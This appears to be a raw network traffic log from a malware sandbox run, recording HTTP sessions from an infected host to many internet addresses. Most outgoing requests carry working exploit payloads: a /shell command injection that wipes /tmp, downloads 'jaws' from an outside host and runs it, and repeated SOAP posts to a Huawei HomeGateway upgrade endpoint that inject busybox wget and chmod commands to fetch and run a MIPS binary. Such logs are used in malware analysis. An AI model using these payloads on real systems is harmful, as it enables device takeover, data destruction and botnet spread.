                                                          Jan 2, 2024 06:24:14.253972054 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:14.603568077 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:14 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:14 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 37 66 30 32 38 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 35 34 26 23 34 36 3b 31 37 38 64 32 65 39 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;97f02817&#46;1704173054&#46;178d2e9a</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          169192.168.2.233761223.208.169.880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:14.264262915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:14.624702930 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:14 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:14 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 34 62 34 64 31 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 35 34 26 23 34 36 3b 34 65 30 39 63 36 61 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;14b4d117&#46;1704173054&#46;4e09c6aa</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          170192.168.2.235571445.66.79.13380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:14.281778097 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:14.518739939 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          171192.168.2.235276849.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:14.631186962 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 31 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:13Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          172192.168.2.235644623.204.125.10680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:14.743068933 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          173192.168.2.2341682157.245.212.16380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:14.930071115 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:15.093712091 CET450INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:15 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.31
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          174192.168.2.2338990173.246.114.1780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:15.084513903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:15.238720894 CET643INHTTP/1.1 302 Found
                                                          Date: Tue, 02 Jan 2024 05:24:14 GMT
                                                          Server: Apache
                                                          Location: http://www.car-parts.com/?cd+/tmp;rm+-rf+*;wget+
                                                          Content-Length: 348
                                                          Keep-Alive: timeout=2, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          X-Pad: avoid browser bug
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 61 72 2d 70 61 72 74 73 2e 63 6f 6d 2f 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 63 61 72 2d 70 61 72 74 2e 63 6f 6d 22 3e 74 72 61 64 65 38 32 37 39 2e 63 61 72 2d 70 61 72 74 2e 63 6f 6d 3c 2f 61 3e 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.car-parts.com/?cd+/tmp;rm+-rf+*;wget+">here</a>.</p><hr><address>Apache Server at <a href="mailto:webmaster@car-part.com">trade8279.car-part.com</a> Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          175192.168.2.235146634.225.232.16580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:15.088251114 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:15.246634007 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:15 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          176192.168.2.2347170103.39.16.6880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:15.125482082 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:15.420337915 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:15 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          177192.168.2.234934613.55.87.22980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:15.126337051 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:15.422188044 CET78INHTTP/1.1 400 BAD_REQUEST
                                                          Content-Length: 0
                                                          Connection: Close


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          178192.168.2.235278649.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:15.390584946 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 31 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:14Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          179192.168.2.2339512156.235.98.937215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:15.985357046 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:20.109899998 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:26.253061056 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:38.283344984 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
